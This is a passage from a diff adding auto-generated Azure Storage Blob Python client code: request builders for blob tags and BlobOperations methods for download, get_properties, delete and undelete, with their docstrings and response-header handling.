_header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_tags_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "tags") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_tags_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "tags") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class BlobOperations(object): # pylint: disable=too-many-public-methods + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def download( + self, + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + range_get_content_md5=None, # type: Optional[bool] + range_get_content_crc64=None, # type: Optional[bool] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Download operation reads or downloads a blob from the system, including its metadata and + properties. You can also call Download to read a snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param range_get_content_md5: When set to true and specified together with the Range, the + service returns the MD5 hash for the range, as long as the range is less than or equal to 4 MB + in size. Default value is None. + :type range_get_content_md5: bool + :param range_get_content_crc64: When set to true and specified together with the Range, the + service returns the CRC64 hash for the range, as long as the range is less than or equal to 4 + MB in size. Default value is None. + :type range_get_content_crc64: bool + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_download_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + range=range, + lease_id=_lease_id, + range_get_content_md5=range_get_content_md5, + range_get_content_crc64=range_get_content_crc64, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.download.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + download.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_properties( # pylint: disable=inconsistent-return-statements + self, + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Get Properties operation returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_properties_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-creation-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-creation-time')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-incremental-copy']=self._deserialize('bool', response.headers.get('x-ms-incremental-copy')) + response_headers['x-ms-copy-destination-snapshot']=self._deserialize('str', response.headers.get('x-ms-copy-destination-snapshot')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-access-tier']=self._deserialize('str', response.headers.get('x-ms-access-tier')) + response_headers['x-ms-access-tier-inferred']=self._deserialize('bool', response.headers.get('x-ms-access-tier-inferred')) + response_headers['x-ms-archive-status']=self._deserialize('str', response.headers.get('x-ms-archive-status')) + response_headers['x-ms-access-tier-change-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-access-tier-change-time')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-expiry-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-expiry-time')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-rehydrate-priority']=self._deserialize('str', response.headers.get('x-ms-rehydrate-priority')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def delete( # pylint: disable=inconsistent-return-statements + self, + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + delete_snapshots=None, # type: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]] + request_id_parameter=None, # type: Optional[str] + blob_delete_type="Permanent", # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """If the storage account's soft delete feature is disabled then, when a blob is deleted, it is + permanently removed from the storage account. If the storage account's soft delete feature is + enabled, then, when a blob is deleted, it is marked for deletion and becomes inaccessible + immediately. However, the blob service retains the blob or snapshot for the number of days + specified by the DeleteRetentionPolicy section of [Storage service properties] + (Set-Blob-Service-Properties.md). After the specified number of days has passed, the blob's + data is permanently removed from the storage account. Note that you continue to be charged for + the soft-deleted blob's storage until it is permanently removed. Use the List Blobs API and + specify the "include=deleted" query parameter to discover which blobs and snapshots have been + soft deleted. You can then use the Undelete Blob API to restore a soft-deleted blob. All other + operations on a soft-deleted blob or snapshot causes the service to return an HTTP status code + of 404 (ResourceNotFound). + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param delete_snapshots: Required if the blob has associated snapshots. Specify one of the + following two options: include: Delete the base blob and all of its snapshots. only: Delete + only the blob's snapshots and not the blob itself. Default value is None. + :type delete_snapshots: str or ~azure.storage.blob.models.DeleteSnapshotsOptionType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_delete_type: Optional. Only possible value is 'permanent', which specifies to + permanently delete a blob if blob soft delete is enabled. Possible values are "Permanent" or + None. Default value is "Permanent". + :type blob_delete_type: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_delete_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + delete_snapshots=delete_snapshots, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_delete_type=blob_delete_type, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def undelete( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Undelete a blob that was previously soft deleted. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + 